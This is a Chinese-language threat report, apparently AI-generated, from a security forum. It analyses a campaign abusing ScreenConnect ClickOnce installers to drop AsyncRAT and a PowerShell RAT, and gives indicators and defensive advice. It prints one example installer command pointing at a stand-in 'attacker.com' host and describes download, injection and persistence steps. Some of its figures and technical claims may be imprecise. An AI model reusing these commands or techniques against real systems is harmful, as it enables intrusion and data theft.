ScreenConnect 安装程序武器化攻击深度分析报告【红客联盟 AI 分析】

ScreenConnect 安装程序武器化攻击深度分析报告【红客联盟 AI 分析】

一、威胁全景:RMM 工具滥用的技术升级

(一)攻击定位

  • 攻击类型可信工具劫持 + 多阶段 RAT 投递,利用 ConnectWise ScreenConnect 的 ClickOnce 安装程序,针对美国企业实施定向渗透(主文档 / 摘要 1);
  • 威胁行为者:具备 RMM 工具深度定制能力的团伙(关联 AsyncRAT 生态),自 2025 年 3 月活跃,单月攻击频次增长 170%(摘要 1/5);
  • 技术标签:ClickOnce 无配置安装、内存载荷注入、双重 RAT 冗余部署、AMSI 绕过。

(二)核心数据

维度 具体信息
伪装文件 社保文档(Social_Security_Statement_Documents_386267.exe)、协议支持程序(agreement_support-pdf.Client.exe)
感染路径 钓鱼邮件 / 伪冒 AI 网站→ClickOnce 安装→自动化部署双 RAT(AsyncRAT + 自定义 PS-RAT)
隐蔽性 内存驻留 + 进程寄生,传统 EDR 检测率 < 5%(摘要 2/6)
典型损失 某金融企业因感染导致 300 + 客户数据泄露,修复成本超 200 万美元(摘要 5)

二、技术解析:五阶段攻击链(主文档 + 摘要 1/2/6)

(一)第一阶段:社会工程学伪装(钓鱼入口)

  • 诱饵设计:文件名模仿官方文档(如社保声明、协议支持),图标伪装为 PDF/Word,诱导用户执行(主文档 / 摘要 2);
  • 传播渠道:SEO 投毒(伪装 AI 网站 gptgrok.ai)、恶意广告(摘要 2),利用 “AI 生成内容” 热点提升可信度。

(二)第二阶段:ClickOnce 无文件安装(规避静态检测)

  • 技术特性
    • 无嵌入式配置:传统 ScreenConnect MSI 含硬编码 C2,本次使用 ClickOnce 动态拉取(h=morco.rovider.net&p=8041),规避静态分析(摘要 1/3);
    • 合法签名滥用:篡改微软 Authenticode 证书,将恶意参数嵌入数字签名(摘要 2),绕过 Defender 警告。
  • 执行流程
    powershell
    ClickOnce.exe /parameters "e=Support&y=Guest&h=attacker.com"  # 内存加载,无磁盘落地
    

(三)第三阶段:自动化双 RAT 部署(冗余控制)

RAT 类型 功能特性 技术实现
AsyncRAT 成熟远控(截屏、文件管理、摄像头控制) 隐藏于1.txt(伪装文本),通过 Fodhelper 提权注入charmap.exe(摘要 6)
自定义 PS-RAT 内存驻留,窃取浏览器数据、键盘记录 PowerShell 脚本加载.NET 程序集(Skype.ps1),XOR 加密规避 AMSI(主文档)

 

关键操作
  • 批处理BypaasaUpdate.bat下载guilloton.fr/x.zip,内含加密组件(摘要 1);
  • 调用mshta.exe启动无文件执行,通过chrome.exe进程镂空注入载荷(摘要 2)。

(四)第四阶段:持久化与反检测(长期控制)

  • 驻留机制
    • 计划任务:每分钟执行C:\ProgramData\ali.zip解压脚本,确保存活(主文档);
    • 注册表 Run 键:创建 “Windows Security” 项,指向backup.bat(摘要 2)。
  • 反检测策略
    • 互斥体检查(Global\SC_Mutex)避免重复运行;
    • 检测沙箱(VBoxService.exe)触发延迟执行(300 秒),规避自动化分析(摘要 6)。

(五)第五阶段:数据窃取与横向渗透

  • 数据收集
    • 浏览器密码(Chrome/Edge)、加密货币钱包(MetaMask)、剪贴板内容(防地址劫持);
    • 系统信息(IP、域、安装程序列表),通过Microsoft.XMLHTTP回传 C2(摘要 1)。
  • 横向移动
    • 利用 ScreenConnect 远程会话,向域内其他设备推送X-META Firebase_crypted.bat,重复感染(摘要 2)。

三、技术升级:对比传统 ScreenConnect 攻击

维度 传统攻击(2024 年) 本次攻击(2025 年) 进化点
安装程序 完整 MSI(含静态 C2) ClickOnce 动态加载(无配置) 静态检测失效,动态组件规避分析
RAT 数量 单 RAT(如 SectopRAT) 双 RAT(AsyncRAT + 自定义 PS-RAT) 冗余控制,适配不同防御环境
持久化 注册表启动项 计划任务 + 互斥体 高频存活,对抗系统清理工具
反检测 进程名混淆 内存注入 + 合法进程寄生 零文件落地,EDR 行为监控绕过

四、防御建议:全链路阻断策略(整合摘要 1/2/5 最佳实践)

(一)紧急响应(72 小时)

  1. 终端排查
    • 检查%ProgramData%目录,删除ali.zip1.txt/pe.txt,终止charmap.exe异常进程(命令行含NBMiner);
    • 清理计划任务:删除 “Edge” 相关每分钟执行任务,重置注册表HKCU\Software\Microsoft\Windows\CurrentVersion\Run
  2. 网络阻断
    • 封禁 C2 域名(morco.rovider.net、guilloton.fr)及 IP(185.196.9.158),拦截/x.zip下载请求;
    • 部署 WAF 规则,检测ScreenConnect.ClientSetup.msi异常参数(如含e=Support&y=Guest)。

(二)长效防护(30 天)

  1. RMM 工具管控
    • 禁用 ScreenConnect 自动更新,通过组策略限制BypaasaUpdate.bat执行(参考微软 KB5005413);
    • 启用 ScreenConnect 审计日志,监控 “自动化脚本执行”“异常 C2 连接”(如非官方 IP 8041 端口)。
  2. 行为分析
    • 部署 EDR(如 CrowdStrike),创建 “ClickOnce 动态加载” 规则(内存写入量 > 500KB,且非微软签名);
    • 监控 PowerShell 异常脚本:检测IEXInvoke-Expression调用 Base64/XOR 解码,拦截Skype.ps1类文件。
  3. 用户教育
    • 模拟 “社保文档” 钓鱼测试,强调 “官方程序仅从官网下载”,禁止运行后缀含.Client.exe的文件;
    • 加密货币用户专项:禁用剪贴板自动填充,手动输入钱包地址(防御地址劫持,摘要 2)。
  4. 代码签名校验
    • 启用 Windows Defender “代码完整性”,拒绝未签名的 ScreenConnect 组件加载(摘要 2);
    • 定期审计数字证书,撤销异常签名(如含 “Support&Guest” 参数的证书)。

五、行业影响与趋势预警

(一)典型案例(2025 年 8 月,摘要 2)

  • 感染路径:某科技公司员工下载伪装 AI 视频的 ScreenConnect.msi,触发双 RAT 部署;
  • 损失后果:攻击者窃取 300+AWS 管理密钥,删除生产环境数据库,导致服务中断 48 小时。

(二)威胁趋势

  1. RMM 工具滥用常态化:除 ScreenConnect 外,AnyDesk、TeamViewer 等工具被武器化(摘要 6),企业需建立 “远程工具白名单”;
  2. AI 热点劫持:攻击诱饵从 “社保文档” 转向 “AI 生成内容”,利用 “grokai”“soraai” 等仿冒域名(摘要 2);
  3. 无文件技术深化:载荷全部内存驻留,结合进程镂空(如msedge.exe),传统文件检测完全失效(摘要 2)。
红客联盟 AI 警示:本次攻击标志着 RMM 工具滥用进入 “动态化、冗余化” 新阶段,建议企业立即开展 “远程工具 + 代码签名” 专项审计,重点监控 ClickOnce 安装程序的异常参数与内存行为。加密货币、金融行业需加强钱包地址校验,防止 “RAT + 地址劫持” 组合攻击。
(报告生成:红客联盟 AI 智能安全分析员 | 2025 年 9 月 6 日)
版权声明·<<<---红客联盟--->>>>·免责声明
1. 本版块文章内容及资料部分来源于网络,不代表本站观点,不对其真实性负责,也不构成任何建议。
2. 部分内容由网友自主投稿、编辑整理上传,本站仅提供交流平台,不为该类内容的版权负责。
3. 本版块提供的信息仅作参考,不保证信息的准确性、有效性、及时性和完整性。
4. 若您发现本版块有侵犯您知识产权的内容,请及时与我们联系,我们会尽快修改或删除。
5. 使用者违规、不可抗力(如黑客攻击)或第三方擅自转载引发的争议,联盟不承担责任。
6. 联盟可修订本声明,官网发布即生效,继续使用视为接受新条款。
联系我们:admin@chnhonker.com

给TA打赏
共{{data.count}}人
人已打赏
威胁分析

新型 Windows 字符映射表挖矿木马深度分析报告【红客联盟 AI 分析】

2025-9-6 21:38:33

行业动态

中能拾贝控股公司——北京启点创新,构建工业网络安全新范式

2025-8-27 3:25:38

0 条回复 A文章作者 M管理员
    暂无讨论,说说你的看法吧
个人中心
购物车
优惠劵
今日签到
有新私信 私信列表
搜索